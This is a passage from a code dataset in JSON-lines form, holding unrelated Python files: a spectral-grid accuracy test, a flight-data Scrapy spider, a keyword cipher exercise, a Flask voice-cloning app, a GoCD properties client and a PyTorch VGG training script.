approximate spectral library\n :type LibraryLA: string\n\n '''\n\n self.DataSpectrum = DataSpectrum\n self.Instrument = Instrument\n\n self.HDF5InterfaceHA = HDF5Interface(LibraryHA)\n self.HDF5InterfaceLA = HDF5Interface(LibraryLA)\n\n print(\"Bounds of the grids are\")\n print(\"HA\", self.HDF5InterfaceHA.bounds)\n print(\"LA\", self.HDF5InterfaceLA.bounds)\n\n #If the DataSpectrum contains more than one order, we only take the first one. To get behavior with a\n # different order, you should only load that via the DataSpectrum(orders=[22]) flag.\n self.wl = self.DataSpectrum.wls[0]\n\n self.fullModelLA = Model(self.DataSpectrum, self.Instrument, self.HDF5InterfaceLA, stellar_tuple=(\"temp\",\n \"logg\", \"Z\", \"vsini\", \"vz\", \"logOmega\"), cheb_tuple=(\"c1\", \"c2\", \"c3\"), cov_tuple=(\"sigAmp\",\n \"logAmp\", \"l\"), region_tuple=(\"loga\", \"mu\", \"sigma\"))\n self.modelLA = self.fullModelLA.OrderModels[0]\n\n\n self.fullModelHA = ModelHA(self.DataSpectrum, self.Instrument, self.HDF5InterfaceHA, stellar_tuple=(\"temp\",\n \"logg\", \"Z\", \"vsini\", \"vz\", \"logOmega\"), cheb_tuple=(\"c1\", \"c2\", \"c3\"), cov_tuple=(\"sigAmp\",\n \"logAmp\", \"l\"), region_tuple=(\"loga\", \"mu\", \"sigma\"))\n self.modelHA = self.fullModelHA.OrderModels[0]\n\n self.parameters = parameters\n self.deltaParameters = deltaParameters\n\n self.base = self.get_specHA(self.parameters)\n self.baseLA = self.get_specLA(self.parameters)\n self.approxResid = get_resid_spec(self.base, self.baseLA) #modelHA - modelLA @ parameters\n\n def get_specHA(self, parameters):\n '''\n Update the model and then query the spectrum\n\n :param parameters: Dictionary of fundamental stellar parameters\n :type parameters: dict\n\n :returns: flux spectrum\n '''\n\n params = parameters.copy()\n params.update({\"vsini\":0., \"vz\":0, \"logOmega\":0.})\n self.fullModelHA.update_Model(params)\n\n return self.modelHA.get_spectrum()\n\n def get_specLA(self, parameters):\n '''\n Update the model and then query the spectrum\n\n :param parameters: Dictionary of fundamental stellar parameters\n :type parameters: dict\n\n :returns: flux spectrum\n '''\n\n params = parameters.copy()\n params.update({\"vsini\":0., \"vz\":0, \"logOmega\":0.})\n self.fullModelLA.update_Model(params)\n\n return self.modelLA.get_spectrum()\n\n def createEnvelopeSpectrum(self, direction='both'):\n '''\n The parameters should always be specified at a grid point of the HDF5 file.\n\n For this, do the deltaParameters interpolation.\n\n Direction specifies whether to do interpolation up (+ 10 K, etc.), down (- 10 K), or\n do both and then find the minimum envelope between the two.\n For now, only up is implemented.\n\n '''\n #For each key, add the delta parameters\n temp_params = self.parameters.copy()\n temp_params[\"temp\"] += self.deltaParameters[\"temp\"]\n temp_spec = get_resid_spec(self.base, self.get_specHA(temp_params))\n\n logg_params = self.parameters.copy()\n logg_params[\"logg\"] += self.deltaParameters[\"logg\"]\n logg_spec = get_resid_spec(self.base, self.get_specHA(logg_params))\n\n Z_params = self.parameters.copy()\n Z_params[\"Z\"] += self.deltaParameters[\"Z\"]\n Z_spec = get_resid_spec(self.base, self.get_specHA(Z_params))\n\n self.envelope = get_min_spec([temp_spec, logg_spec, Z_spec])\n\n def plot_quality(self):\n '''\n Visualize the quality of the interpolation.\n\n Two-panel plot.\n\n Top: HA and LA spectrum\n\n Bottom: Residual between HA + LA spectrum and the HA spectrum error bounds for deltaParameters\n\n '''\n\n self.createEnvelopeSpectrum()\n\n fig, ax = plt.subplots(nrows=2, figsize=(8,6), sharex=True)\n ax[0].plot(self.wl, self.base, \"b\", label=\"HA\")\n ax[0].plot(self.wl, self.baseLA, \"r\", label=\"LA\")\n ax[0].legend()\n ax[0].set_ylabel(r\"$\\propto f_\\lambda$\")\n ax[0].set_title(\"Temp={temp:} logg={logg:} Z={Z:}\".format(**self.parameters))\n\n ax[1].semilogy(self.wl, self.approxResid, \"k\", label=\"(HA - LA)/HA\")\n ax[1].semilogy(self.wl, self.envelope, \"b\", label=\"Interp Envelope\")\n ax[1].legend()\n ax[1].set_xlabel(r\"$\\lambda$\\AA\")\n ax[1].set_ylabel(\"fractional error\")\n\n return fig\n\n\ndef main():\n from StellarSpectra.spectrum import DataSpectrum\n from StellarSpectra.grid_tools import TRES\n\n myDataSpectrum = DataSpectrum.open(\"../../data/WASP14/WASP14-2009-06-14.hdf5\", orders=np.array([22]))\n myInstrument = TRES()\n\n myComp = AccuracyComparison(myDataSpectrum, myInstrument, \"../../libraries/PHOENIX_submaster.hdf5\",\n \"../../libraries/PHOENIX_objgrid6000.hdf5\",\n {\"temp\":6000, \"logg\":4.5, \"Z\":-0.5}, {\"temp\":10, \"logg\":0.05, \"Z\": 0.05})\n\n myComp.plot_quality()\n\nif __name__==\"__main__\":\n main()","sub_path":"tests/accuracy/grid_accuracy.py","file_name":"grid_accuracy.py","file_ext":"py","file_size_in_byte":7078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"538223452","text":"# -*- coding: utf-8 -*-\r\nimport scrapy\r\nfrom extractor.in_port_info import InPortInfo\r\n\r\n\r\nclass ExtractInSpider(scrapy.Spider):\r\n name = \"in_port\"\r\n allowed_domains = ['www.carnoc.com']\r\n start_urls = ['http://data.carnoc.com/corp/airport/cgq__airportflight.html']\r\n\r\n def parse(self, response):\r\n node_list = response.xpath(\"//div[@class='arrive left']/ul/div[@id='icefable1']/li\")\r\n # print(len(node_list))\r\n items = []\r\n for node in node_list:\r\n item = InPortInfo()\r\n\r\n item['flight_id'] = node.xpath(\"./span[1]/text()\").extract()[0]\r\n\r\n # 始发地\r\n item['origin'] = node.xpath(\"./span[@class='flt_city']/text()\").extract()[0]\r\n # 接机楼\r\n item['origin_terminal'] = node.xpath(\"./span[@class='terminal']/text()\").extract()[0]\r\n\r\n item['take_off_time'] = node.xpath(\"./span[4]/text()\").extract()[0]\r\n\r\n item['take_off_real_time'] = node.xpath(\"./span[5]/text()\").extract()[0]\r\n\r\n item['origin_state'] = node.xpath(\"./span[6]/text()\").extract()[0]\r\n\r\n items.append(item)\r\n\r\n return items\r\n","sub_path":"extractor/spiders/extract_in.py","file_name":"extract_in.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"392982220","text":"# import modules\n\n# initialize variables\nALPHABET = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\noutput = \"\"\n\n# define functions\n\n\ndef file_read(file_name):\n # read in file, replace newline characters, convert to uppercase and return\n file_obj = open(file_name, 'r')\n file_content = file_obj.read()\n file_obj.close()\n file_content = file_content.replace('\\n', ' ')\n file_content = file_content.upper()\n return file_content\n\n\ndef file_write(file_name, file_content):\n # write out file_content to file_name\n file_obj = open(file_name, 'w')\n file_obj.write(file_content)\n file_obj.close()\n\n\ndef make_keyphrase(word1, word2, message_len):\n # keyphrase = concantonated keywords times (integer of (length of message\n # divided by length of keyword) plus one)\n words = word1 + word2\n final_phrase = words * (int(message_len/len(words))+1)\n return final_phrase\n\n\n# get user input\n# encrypt or decrypt\nchoice = \"\"\nwhile choice != \"e\" and choice != \"d\":\n choice = input(\"Encrypt or Decrypt message? e/d \")\n choice = choice.lower()\n\n# keywords -> convert to uppercase\ncipherword_1 = input(\"Enter your first cipher word: \")\ncipherword_1 = cipherword_1.upper()\ncipherword_2 = input(\"Enter your second cipher word: \")\ncipherword_2 = cipherword_2.upper()\n\n# encrypt\nif choice == \"e\":\n # read in plaintext file\n message = file_read('A453_CA3_Task3_plaintext.txt')\n message_length = len(message)\n\n # generate keyphrase\n keyphrase = make_keyphrase(cipherword_1, cipherword_2, message_length)\n\n # loop through message\n for i in range(message_length):\n\n # if character is space, append to plaintext message\n if message[i] == \" \":\n output = output + \" \"\n else:\n\n # determine alphabet index of message character and equivilent\n # keypharse character. increase each index by 1\n x = ALPHABET.index(message[i]) + 1\n y = ALPHABET.index(keyphrase[i]) + 1\n\n # add index values together to get cypher character index\n # handle values greater than 26 using modulo maths\n z = (x + y) % 26\n\n # append cypher character to encrypted message\n output = output + ALPHABET[z-1]\n\n # write out encripted file\n file_write('A453_CA3_Task3_encripted.txt', output)\n\n# decrypt\nelse:\n # read in encripted file\n message = file_read('A453_CA3_Task3_encripted.txt')\n message_length = len(message)\n\n # generate keyphrase\n keyphrase = make_keyphrase(cipherword_1, cipherword_2, message_length)\n\n # loop through message\n for i in range(message_length):\n\n # if character is space, append to plaintext message\n if message[i] == \" \":\n output = output + \" \"\n else:\n\n # determine alphabet index of message character and equivilent\n # keypharse character. increase each index by 1\n x = ALPHABET.index(message[i]) + 1\n y = ALPHABET.index(keyphrase[i]) + 1\n\n # add 26 to message index then subtract keyphrase index.\n # handle values greater than 26 using modulo maths\n z = ((x + 26) - y) % 26\n\n # append plaintext character to decrypted message\n output = output + ALPHABET[z-1]\n\n # write our plaintext file\n file_write('A453_CA3_Task3_decripted.txt', output)\n\nprint(\"Process complete\")\n","sub_path":"assessments/ocr/2014/A453_CA3_Task3.py","file_name":"A453_CA3_Task3.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"345383711","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom flask import Flask, render_template, redirect, url_for, request, send_from_directory\nimport numpy as np\nimport os\nimport uuid\nfrom synthesizer.inference import Synthesizer\nfrom encoder import inference as encoder\nfrom vocoder import inference as vocoder\nfrom pathlib import Path\nimport librosa\nfrom pydub import AudioSegment\nimport subprocess\nimport time\nimport wave\n\nsynthesizer = None\n\n\ndef init_model():\n enc_model_fpath = \"/home/ilseo/source/Real-Time-Voice-Cloning/encoder/saved_models/batch64_10_e256_val_12_epoch.pt\"\n syn_model_dir = \"/home/ilseo/source/Real-Time-Voice-Cloning/synthesizer/saved_models/logs-synth_kr_epoch12_508k_steps/\"\n voc_model_fpath = \"/home/ilseo/source/Real-Time-Voice-Cloning/vocoder/saved_models/dim256_gta_bs256_epoch_12_508k_20190926/dim256_gta_bs256_epoch_12_508k_20190926.pt\"\n\n enc_path = Path(enc_model_fpath)\n syn_path = Path(syn_model_dir)\n voc_path = Path(voc_model_fpath)\n encoder.load_model(enc_path)\n global synthesizer\n synthesizer = Synthesizer(syn_path.joinpath(\"taco_pretrained\"))\n vocoder.load_model(voc_path)\n\n\ndef create_app():\n app = Flask(__name__)\n\n def run_on_start():\n init_model()\n\n run_on_start()\n return app\n\n\ntmp_dir = \"/home/ilseo/source/Real-Time-Voice-Cloning/static/tmp\"\nos.makedirs(tmp_dir, exist_ok=True)\nwav_result_dir = \"/home/ilseo/source/Real-Time-Voice-Cloning/static/result\"\nos.makedirs(wav_result_dir, exist_ok=True)\napp = create_app()\n\n\n# app = Flask(__name__)\n\n@app.route(\"/upload\")\ndef upload():\n return render_template(\"upload.html\")\n\n\n@app.route(\"/index\")\ndef index():\n return render_template(\"recorder.html\")\n\n\n@app.route(\"/record\", methods=['POST', 'GET'])\ndef record():\n f = request.files['audio']\n filename = str(uuid.uuid4())\n ext = os.path.splitext(request.files['audio'].filename)[1]\n text_list = request.form.get('text_list', default=\"텍스트를 입력하라 말이여.\")\n text_list = text_list.split(os.linesep)\n print(text_list)\n f.save(os.path.join(tmp_dir, filename + ext))\n\n if ext.lower() in [\".mp3\", \".m4a\"]:\n command = \"avconv -i %s %s\" % (os.path.join(tmp_dir, filename + ext), os.path.join(tmp_dir, filename + \".wav\"))\n\n subprocess.call(command, shell=True)\n target_wav_path = os.path.join(tmp_dir, filename + \".wav\")\n target_filename = filename + \".wav\"\n filename_list = []\n elapsed_list = []\n result_text_list = []\n for j, text in enumerate(text_list):\n text = text.strip()\n if len(text) == 0:\n continue\n result_text_list.append(text)\n ## Load the models one by one.\n print(\"Preparing the encoder, the synthesizer and the vocoder...\")\n\n ## Computing the embedding\n # First, we load the wav using the function that the speaker encoder provides. This is\n # important: there is preprocessing that must be applied.\n\n # The following two methods are equivalent:\n # - Directly load from the filepath:\n # preprocessed_wav = encoder.preprocess_wav(target_wav_path)\n # - If the wav is already loaded:\n start = time.time()\n original_wav, sampling_rate = librosa.load(target_wav_path)\n preprocessed_wav = encoder.preprocess_wav(original_wav, sampling_rate)\n print(\"Loaded file succesfully\")\n\n embed = encoder.embed_utterance(preprocessed_wav)\n print(\"Created the embedding\")\n\n # The synthesizer works in batch, so you need to put your data in a list or numpy array\n texts = [text]\n embeds = [embed]\n # If you know what the attention layer alignments are, you can retrieve them here by\n # passing return_alignments=True\n specs = synthesizer.synthesize_spectrograms(texts, embeds)\n spec = specs[0]\n print(\"Created the mel spectrogram\")\n\n ## Generating the waveform\n print(\"Synthesizing the waveform:\")\n # Synthesizing the waveform is fairly straightforward. Remember that the longer the\n # spectrogram, the more time-efficient the vocoder.\n generated_wav = vocoder.infer_waveform(spec)\n\n ## Post-generation\n # There's a bug with sounddevice that makes the audio cut one second earlier, so we\n # pad it.\n generated_wav = np.pad(generated_wav, (0, synthesizer.sample_rate), mode=\"constant\")\n\n # Save it on the disk\n tmp_filename = \"%s_%d.wav\" % (filename, j)\n audio_path = os.path.join(wav_result_dir, tmp_filename)\n librosa.output.write_wav(audio_path, generated_wav.astype(np.float32),\n synthesizer.sample_rate)\n filename_list.append(tmp_filename)\n elapsed_list.append(str(time.time() - start))\n\n wavs = [AudioSegment.from_wav(os.path.join(wav_result_dir, wav)) for wav in filename_list]\n combined = wavs[0]\n for wav in wavs[1:]:\n combined = combined.append(wav)\n join_filename = \"%s_join.wav\" % filename\n combined.export(os.path.join(wav_result_dir, join_filename), format=\"wav\")\n\n return render_template(\"synth.html\", file_list=filename_list, target_filename=target_filename,\n text_list=result_text_list,\n elapsed_list=elapsed_list, len=len(filename_list), join_filename=join_filename,\n all_text=\" \".join(result_text_list))\n\n\n@app.after_request\ndef add_header(r):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n r.headers['Cache-Control'] = 'public, max-age=0'\n return r\n\n\n@app.route('/download/', methods=['GET', 'POST'])\ndef download(filename):\n return send_from_directory(directory=wav_result_dir, filename=filename, as_attachment=True)\n\n\n@app.route('/download_mp3/', methods=['GET', 'POST'])\ndef download_mp3(filename):\n new_filename = os.path.splitext(filename)[0] + \".mp3\"\n AudioSegment.from_wav(os.path.join(wav_result_dir, filename)).export(os.path.join(wav_result_dir, new_filename),\n format=\"mp3\")\n return send_from_directory(directory=wav_result_dir, filename=new_filename, as_attachment=True)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, threaded=False)\n","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"110531808","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n###############################################################################\n# The MIT License\n#\n# Copyright (c) 2016 Grigory Chernyshev\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n###############################################################################\n\nfrom six import StringIO\nimport csv\n\nfrom yagocd.resources import BaseManager\n\n\nclass PropertyManager(BaseManager):\n \"\"\"\n The properties API allows managing of job properties.\n \"\"\"\n\n def __init__(\n self,\n session,\n pipeline_name=None,\n pipeline_counter=None,\n stage_name=None,\n stage_counter=None,\n job_name=None\n ):\n \"\"\"\n Constructs instance of ``PropertyManager``.\n Parameters to the constructor and methods of the class could be duplicated. That is because of two use cases\n of this class:\n 1. When the class being instantiated from :class:`yagocd.client.Client`, we don't know all the necessary\n parameters yet, but we need an instance to work with. So we skip parameters instantiation in constructor,\n but require them for each method.\n 2. When the class being used from :class:`yagocd.resources.job.JobInstance` - in this case we already\n know all required parameters, so we can instantiate `PropertyManager` with them.\n\n :param session: session object from client.\n :type session: yagocd.session.Session.\n :param pipeline_name: name of the pipeline.\n :param pipeline_counter: pipeline counter.\n :param stage_name: name of the stage.\n :param stage_counter: stage counter.\n :param job_name: name of the job.\n \"\"\"\n super(PropertyManager, self).__init__(session)\n\n self.base_api = self._session.base_api(api_path='')\n\n self._pipeline_name = pipeline_name\n self._pipeline_counter = pipeline_counter\n self._stage_name = stage_name\n self._stage_counter = stage_counter\n self._job_name = job_name\n\n def list(\n self,\n pipeline_name=None,\n pipeline_counter=None,\n stage_name=None,\n stage_counter=None,\n job_name=None\n ):\n \"\"\"\n Lists all job properties.\n\n :param pipeline_name: name of the pipeline.\n :param pipeline_counter: pipeline counter.\n :param stage_name: name of the stage.\n :param stage_counter: stage counter.\n :param job_name: name of the job.\n :return: dictionary of properties.\n :rtype: dict[str, str]\n \"\"\"\n assert self._pipeline_name or pipeline_name\n assert self._pipeline_counter or pipeline_counter\n assert self._stage_name or stage_name\n assert self._stage_counter or stage_counter\n assert self._job_name or job_name\n\n response = self._session.get(\n path='{base_api}/properties/{pipeline_name}/{pipeline_counter}/{stage_name}/{stage_counter}/{job_name}'.format(\n base_api=self.base_api,\n pipeline_name=self._pipeline_name or pipeline_name,\n pipeline_counter=self._pipeline_counter or pipeline_counter,\n stage_name=self._stage_name or stage_name,\n stage_counter=self._stage_counter or stage_counter,\n job_name=self._job_name or job_name\n ),\n headers={'Accept': 'application/json'},\n )\n text = StringIO(response.text)\n parsed = list(csv.reader(text))\n properties = dict(zip(parsed[0], parsed[1]))\n\n return properties\n\n def get(\n self,\n name,\n pipeline_name=None,\n pipeline_counter=None,\n stage_name=None,\n stage_counter=None,\n job_name=None\n ):\n \"\"\"\n Gets a property by its name.\n :info: You can use keyword `latest` as a pipeline counter or a stage counter.\n\n :param name: name of property to get.\n :param pipeline_name: name of the pipeline.\n :param pipeline_counter: pipeline counter.\n :param stage_name: name of the stage.\n :param stage_counter: stage counter.\n :param job_name: name of the job.\n :return: single property as a dictionary.\n \"\"\"\n assert self._pipeline_name or pipeline_name\n assert self._pipeline_counter or pipeline_counter\n assert self._stage_name or stage_name\n assert self._stage_counter or stage_counter\n assert self._job_name or job_name\n\n response = self._session.get(\n path='{base_api}/properties/{pipeline_name}/{pipeline_counter}/{stage_name}/{stage_counter}/{job_name}/{name}'.format(\n base_api=self.base_api,\n pipeline_name=self._pipeline_name or pipeline_name,\n pipeline_counter=self._pipeline_counter or pipeline_counter,\n stage_name=self._stage_name or stage_name,\n stage_counter=self._stage_counter or stage_counter,\n job_name=self._job_name or job_name,\n name=name\n ),\n headers={'Accept': 'application/json'},\n )\n text = StringIO(response.text)\n parsed = list(csv.reader(text))\n properties = dict(zip(parsed[0], parsed[1]))\n\n return properties\n\n def historical(self, pipeline_name=None, stage_name=None, job_name=None, limit_pipeline=None, limit_count=None):\n \"\"\"\n Get historical properties.\n :info: `limitPipeline` and `limitCount` are optional parameters. The default value of\n `limitPipeline` is latest pipeline instance’s counter. The default value of `limitCount` is `100`.\n\n :param pipeline_name: name of the pipeline.\n :param stage_name: name of the stage.\n :param job_name: name of the job.\n :param limit_pipeline: pipeline limit for returned properties.\n :param limit_count: count limit for returned properties.\n :return: list of dictionaries as historical values.\n \"\"\"\n assert self._pipeline_name or pipeline_name\n assert self._stage_name or stage_name\n assert self._job_name or job_name\n\n params = {\n 'pipelineName': self._pipeline_name or pipeline_name,\n 'stageName': self._stage_name or stage_name,\n 'jobName': self._job_name or job_name,\n }\n if limit_pipeline is not None:\n params['limitPipeline'] = limit_pipeline\n if limit_count is not None:\n params['limitCount'] = limit_count\n\n response = self._session.get(\n path='{base_api}/properties/search'.format(base_api=self.base_api),\n params=params,\n headers={'Accept': 'application/json'},\n )\n\n text = StringIO(response.text)\n result = list(csv.DictReader(text))\n\n return result\n\n def create(\n self,\n name,\n value,\n pipeline_name=None,\n pipeline_counter=None,\n stage_name=None,\n stage_counter=None,\n job_name=None\n ):\n \"\"\"\n Defines a property on a specific job instance.\n\n :param name: name of property.\n :param value: value of property.\n :param pipeline_name: name of the pipeline.\n :param pipeline_counter: pipeline counter.\n :param stage_name: name of the stage.\n :param stage_counter: stage counter.\n :param job_name: name of the job.\n :return: an acknowledgement that the property was created.\n \"\"\"\n assert self._pipeline_name or pipeline_name\n assert self._pipeline_counter or pipeline_counter\n assert self._stage_name or stage_name\n assert self._stage_counter or stage_counter\n assert self._job_name or job_name\n\n response = self._session.post(\n path='{base_api}/properties/{pipeline_name}/{pipeline_counter}/{stage_name}/{stage_counter}/{job_name}/{name}'.format(\n base_api=self.base_api,\n pipeline_name=self._pipeline_name or pipeline_name,\n pipeline_counter=self._pipeline_counter or pipeline_counter,\n stage_name=self._stage_name or stage_name,\n stage_counter=self._stage_counter or stage_counter,\n job_name=self._job_name or job_name,\n name=name\n ),\n data={'value': value},\n headers={\n 'Accept': 'application/json',\n 'Confirm': 'true'\n },\n )\n return response.text\n","sub_path":"yagocd/resources/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":9572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"318064077","text":"__author__ = 'kanami'\nfrom torchvision import transforms,utils\nimport data_handler as dh\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.utils.data as Data\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport math\nfrom torch.autograd import Variable\nEPOCHS = 1\nLR = 0.001\nBATCH_SIZE = 20\n# VGG网络定义\n\n\nclass VGGnet(nn.Module):\n def __init__(self,num_classses=1000,init_weights=True):\n super(VGGnet,self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=3,out_channels=64,kernel_size=3,stride=1,padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(in_channels=64,out_channels=64,kernel_size=3,stride=1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.BatchNorm2d(64),\n nn.MaxPool2d(kernel_size=2) #(32,14,14)\n )\n self.conv3 = nn.Sequential(\n nn.Conv2d(64,128,3,1,1),\n nn.BatchNorm2d(128),\n nn.ReLU()\n )\n self.conv4= nn.Sequential(\n nn.Conv2d(128,128,3,1,1),\n nn.BatchNorm2d(128),\n nn.ReLU(),\n nn.BatchNorm2d(128),\n nn.MaxPool2d(2)\n )\n self.conv5 = nn.Sequential(\n nn.Conv2d(128,256,3,1,1),\n nn.BatchNorm2d(256),\n nn.ReLU()\n )\n self.conv6 = nn.Sequential(\n nn.Conv2d(256,256,3,1,1),\n nn.BatchNorm2d(256),\n nn.ReLU()\n )\n self.conv7 = nn.Sequential(\n nn.Conv2d(256,256,3,1,1),\n nn.BatchNorm2d(256),\n nn.ReLU()\n )\n self.conv8=nn.Sequential(\n nn.Conv2d(256,256,3,1,1),\n nn.BatchNorm2d(256),\n nn.ReLU(),\n nn.BatchNorm2d(256),\n nn.MaxPool2d(2)\n )\n self.conv9 = nn.Sequential(\n nn.Conv2d(256,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv10 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv11 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv12 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.BatchNorm2d(512),\n nn.MaxPool2d(2)\n )\n self.conv13 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv14 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv15 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU()\n )\n self.conv16 = nn.Sequential(\n nn.Conv2d(512,512,3,1,1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.BatchNorm2d(512),\n nn.MaxPool2d(2)\n )\n self.classifier = nn.Sequential(\n nn.Linear(512*3*3,4096),\n nn.BatchNorm2d(4096),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(4096,4096),\n nn.BatchNorm2d(4096),\n nn.ReLU(True),\n nn.Dropout(0.5),\n\n )\n self.out = nn.Linear(4096,num_classses)\n if init_weights:\n self._initialize_weights()\n def forward(self,x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = self.conv6(x)\n x = self.conv7(x)\n x = self.conv8(x)\n x = self.conv9(x)\n x = self.conv10(x)\n x = self.conv11(x)\n x = self.conv12(x)\n x = self.conv13(x)\n x = self.conv12(x)\n x = self.conv15(x)\n x = self.conv15(x)\n x = self.conv16(x)\n x =x.view(x.size(0),-1)\n x = self.classifier(x)\n output = self.out(x)\n #print(output.shape,'nnoutput')\n return output,x\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m,nn.Conv2d):\n n = m.kernel_size[0]*m.kernel_size[1]*m.out_channels\n m.weight.data.normal_(0,math.sqrt(2./n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m,nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m,nn.Linear):\n m.weight.data.normal_(0,0.01)\n m.bias.data.zero_()\n\n# data loader\n\ndef default_loader(path):\n return Image.open(path).convert('RGB')\n\nclass MyDataset(Data.Dataset):\n def __init__(self,root='./data',train='train',transform=None,target_transform=None,loader=default_loader):\n self.imgs = []\n if train == 'train':\n self.X_train,self.y_train = dh.get_train_data(root)\n for i in range(self.y_train.shape[0]): #I've tried to get rid of this loop,but failed\n self.imgs.append((self.X_train[i],self.y_train[i]))\n elif train =='test':\n self.X_test,self.y_test = dh.get_test_data(root)\n for i in range(self.y_test.shape[0]):\n self.imgs.append((self.X_test[i],self.y_test[i]))\n elif train =='valid':\n self.X_valid,self.y_valid = dh.get_valid_data(root)\n for i in range(self.y_valid.shape[0]):\n self.imgs.append((self.X_valid[i],self.y_valid[i]))\n self.transform = transform\n self.target_transform = target_transform\n self.loader = loader\n def __getitem__(self, item):\n # get train data and label frome index in the dataset\n data, label = self.imgs[item]\n \n img = Image.fromarray(data)\n\n if self.transform is not None:\n img = self.transform(img)\n return img,label\n def __len__(self):\n return len(self.imgs)\n\ntransform = transforms.Compose(\n [\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))\n ]\n)\n# I have resize train data in helper function. # but it isn't the best way to do\n#traindata = r'./data/train.txt'\nroot =r'./data'\n# train = {train,test,valid}\ntrain_dataset = MyDataset(root=root,train='train',transform=transform)\ntrain_loader =Data.DataLoader(\n dataset =train_dataset,\n batch_size=BATCH_SIZE,\n num_workers=2,\n)\n#testdata = './data/test.txt'\ntest_dataset = MyDataset(root=root,train='test',transform=transform)\ntest_loader = Data.DataLoader(\n dataset=test_dataset,\n batch_size=10,\n)\n\ndef show_batch(imgs):\n grid = utils.make_grid(imgs)\n plt.imshow(grid.numpy().transposs((1,2,0)))\n plt.title(\"Batch from dataloader\")\nif __name__=='__main__':\n #test_model\n my_vgg = VGGnet(num_classses=43)\n optimizer = torch.optim.Adam(my_vgg.parameters(),lr=LR)\n loss_func = nn.CrossEntropyLoss()\n for epoch in range(EPOCHS):\n #print(epoch)\n for step,(x,y) in enumerate(train_loader):\n #print(x.shape,y.shape)\n b_x = Variable(x)\n b_y = Variable(y.long())\n #print(b_x.shape,b_y.shape)\n output = my_vgg(b_x)[0]\n #print(\"type(b_y[0]):\",type(b_y[0]),'b_y.shape:',b_y.shape,'type(b_y)',type(b_y))\n #print(\"type(y[0]):\",type(y[0]),'b_y.shape:',y.shape,'type(y)',type(y))\n loss = loss_func(output,b_y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step%5 ==0:\n for step,(x_test,y_test) in enumerate(test_loader):\n if step>0:\n break\n x_test = Variable(x_test)\n y_test = Variable(y_test.long())\n test_output,last_layer = my_vgg(x_test)\n pred_v = torch.max(test_output,1)[1].data.squeeze()\n print(type(pred_v),pred_v.shape,print(type(y_test),y_test.shape))\n accuracy = sum(pred_v==y_test.long())/float(y_test.size(0))\n print('Epoch:',epoch,'|train loss:%.4f'%loss.data[0],'|test accuracy: %.2f'%accuracy)\n\n\n","sub_path":"vgg_bn.py","file_name":"vgg_bn.py","file_ext":"py","file_size_in_byte":8421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} 